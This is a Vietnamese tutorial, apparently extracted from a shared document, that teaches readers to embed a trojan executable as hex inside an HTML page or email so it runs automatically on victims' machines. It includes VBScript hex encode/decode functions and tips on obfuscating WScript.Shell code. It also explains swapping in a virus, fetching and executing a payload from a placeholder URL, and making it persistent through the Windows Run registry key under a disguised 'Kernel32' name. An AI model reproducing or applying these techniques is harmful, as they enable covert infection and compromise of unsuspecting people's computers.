Kỹ thuật gắn Trojan vào file HTML :

Kỹ thuật gắn Trojan vào file HTML : trang này đã được đọc lần Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không???
Nội dung trích xuất từ tài liệu:
Kỹ thuật gắn Trojan vào file HTML : Kỹ thuật gắn Trojan vào file HTML :trang này đã được đọc lầnBạn muốn chạy tự động 1 trojan trên máy tính người khác khi họxem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩnhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề!1) Hướng dẫn:· Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb.Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.comhoặc tự viết một filetrojan.exe để xài!· Bước 2: chạy convert16.exe để convert file trojan.exe sangtrojan.hex· Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùngEditPlus, nó rấthay!) để sửa file temp.htm như sau:Thay phần .doc=”4D5A900... 64620000” thành .doc=”” VD: .doc=”9631447da55abcd44ac25...”· Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trangWeb hoặc Email và gởi đến cho người khác!2) Mã nguồn:· Files:§ tempsrc.hta dùng để extract và execute trojan.exe§ tempsrc.htm file htm chính§ convert16.vbp & convert16.frm : file nguồn của chương trìnhConvert 16, được viết bằng Visual Basic 6, dùng để convert file .exesang file .hex· Những vấn đề chính:§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ nhưtrojan.exeChuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kítự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu,tôi đưa ra ví dụ sau:Kí tựLPTVClub2001Mã ANSI ở hệ 10768084863267108117983250484849Mã ANSI ở hệ 164C50545620436C75622032303031Encode16 Decode16“LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club2001”‘--- VBScript Code ---function encode16(st)for i = 1 to len(st)temp = hex((asc(mid(st,i,1)))‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tựif len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0vào trước! Ví dụ: 0A, 07, ...temp =”0” & tempend ifencode16 = encode16 & tempnextend functionfunction decode16(st)for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2kí tự nên bước nhảy step = 2decode16 = decode16 & chr(“&h” & mid(st,i,2))‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trongchuổi‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùngđể chỉ hệ 16nextend function‘--- VBScript Code ---§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm. Mục đích:+ giảm kích thước file+ làm cho mã lệnh khó đọc đối với người khác. Ví dụ: thay vì viết lệnh rõ ràng:on error resume nextdn=chr(34)xd=vbcrlfset wsh=createobject(wscript.shell)set fso=createobject(scripting.filesystemobject)Chúng ta cũng có thể viết lại như sau:on error resume next j=chr(34) q=vbcrlf setg=createobject(wscript.shell) sett6=createobject(scripting.filesystemobject)Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?3) Hỏi/Đáp:· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầunhư đều là các file .exe chương trình có khả năng tự thực thi nên bạnhoàn toàn có thể thay đổi theo ý muốn của bạn!· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớnkinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng vềvà execute nó? Có được không?Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 filechương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là downloadtrojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thihành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa filetemp.exe và thêm lệnh tạo registry-startup cho file temp.exe!...wsh.regwrite“HKLMSoftwareMicrosoftWindowsCurrentVersionRunKernel32”,filetrojan...